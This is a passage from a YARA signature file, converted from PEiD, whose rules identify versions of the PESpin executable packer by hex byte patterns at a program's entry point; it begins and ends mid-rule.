82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 
00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V03_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V11_cyberbobnbsp_nbsp_SignByfly_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 ?? 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? 
F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 ?? 4E 40 00 8B 42 3C 03 C2 89 85 ?? 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D ?? 4E 40 00 53 8F 85 ?? 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD ?? 4F 40 00 8D 5B 04 8B 1B 89 9D ?? 4F 40 00 E8 00 00 00 00 58 01 68 05 68 BC 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD ?? 
4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_v13_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 0D 4F 40 00 8B 42 3C 03 C2 89 85 17 4F 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D 2B 4F 40 00 53 8F 85 21 4D 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD D0 4F 40 00 8D 5B 04 8B 1B 89 9D D5 4F 40 00 E8 00 00 00 00 58 01 68 05 68 F7 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v10_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 D2 42 40 00 8B 42 3C 03 C2 89 85 DC 42 
40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D F0 42 40 00 53 8F 85 94 41 40 00 BB ?? 00 00 00 B9 8C 0B 00 00 8D BD 80 43 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 40 4E 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 FD 68 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V11_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_10_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_13_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V0b_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 26 E8 01 00 00 00 ?? 5A 33 C9 ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 8B 59 24 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 53 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 0C 5B 6A 17 59 30 0C 03 02 CB 4B 75 F8 40 8D 9D 41 8F 4E 00 50 53 81 2C 24 01 78 0E 00 ?? ?? ?? ?? ?? ?? C3 92 EB 15 68 ?? ?? ?? ?? ?? B9 ?? 08 00 00 ?? ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 1D 01 00 00 59 ?? ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA 68 ?? ?? ?? ?? 50 01 6C 24 04 E8 BD 09 00 00 33 C0 0F 84 C0 08 00 00 ?? ?? ?? ?? ?? ?? 50 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF E0 C3 8D 64 24 04 E8 53 0A 00 00 D7 58 5B 51 C3 F7 F3 32 DA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 81 2C 24 A3 00 00 00 58 ?? ?? ?? ?? ?? ?? 53 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 
00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v03_Eng_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_13_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 
00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_07_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_03_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V11_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v10_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 
4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 D2 42 40 00 8B 42 3C 03 C2 89 85 DC 42 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D F0 42 40 00 53 8F 85 94 41 40 00 BB ?? 00 00 00 B9 8C 0B 00 00 8D BD 80 43 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 40 4E 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 FD 68 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V13betaX_cyberbob_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? 
F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 8? 
}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v03_Eng_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 0D 4F 40 00 8B 42 3C 03 C2 89 85 17 4F 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D 2B 4F 40 00 53 8F 85 21 4D 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD D0 4F 40 00 8D 5B 04 8B 1B 89 9D D5 4F 40 00 E8 00 00 00 00 58 01 68 05 68 F7 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v03_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 
2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 ?? 4E 40 00 8B 42 3C 03 C2 89 85 ?? 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D ?? 4E 40 00 53 8F 85 ?? 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD ?? 4F 40 00 8D 5B 04 8B 1B 89 9D ?? 4F 40 00 E8 00 00 00 00 58 01 68 05 68 BC 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD ?? 
